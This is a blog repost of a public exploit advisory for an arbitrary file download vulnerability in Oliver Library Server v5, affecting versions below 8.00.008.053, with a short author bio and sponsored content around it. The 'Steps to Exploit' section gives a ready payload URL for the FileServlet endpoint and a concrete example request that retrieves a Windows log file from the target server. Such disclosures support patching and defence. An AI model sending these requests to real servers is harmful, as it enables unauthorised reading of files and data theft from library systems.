Sunday, December 22, 2024

Oliver Library Server v5 – Arbitrary File Download

# Exploit Title: Oliver Library Server v5 - Arbitrary File Download
# Exploit Authors: Mandeep Singh, Ishaan Vij, Luke Blues, CTRL Group
# Vendor Homepage: https://www.softlinkint.com/product/oliver/ 
# Product: Oliver Server v5
# Version: < 8.00.008.053
# Tested on: Windows Server 2016

Technical Description:
An arbitrary file download vulnerability in Oliver v5 Library Server Versions < 8.00.008.053 via the FileServlet function allows for arbitrary file download by an attacker using unsanitized user supplied input.

Steps to Exploit:

1)  Use the following Payload:
        https://<hostaddress>/oliver/FileServlet?source=serverFile&fileName=<arbitrary file path>

2) Example to download iis.log file:
        https://<hostaddress>/oliver/FileServlet?source=serverFile&fileName=c:/windows/iis.log
Bookmark
Please login to bookmarkClose
Share the word, let's increase Cybersecurity Awareness as we know it
Recommended:  RCE in Sophos Firewall is being exploited in the wild (CVE-2022-3236)
- Sponsored -

Sponsored Offer

Unleash the Power of the Cloud: Grab $200 Credit for 60 Days on DigitalOcean!

Digital ocean free 200

Discover more infosec

Steven Black (n0tst3)
Hello! I'm Steve, an independent security researcher, and analyst from Scotland, UK. I've had an avid interest in Computers, Technology and Security since my early teens. 20 years on, and, it's a whole lot more complicated... I've assisted Governments, Individuals and Organizations throughout the world. Including; US DOJ, NHS UK, GOV UK. I'll often reblog infosec-related articles that I find interesting. On the RiSec website, You'll also find a variety of write-ups, tutorials and much more!

more infosec reads

Subscribe for weekly updates

explore

more

security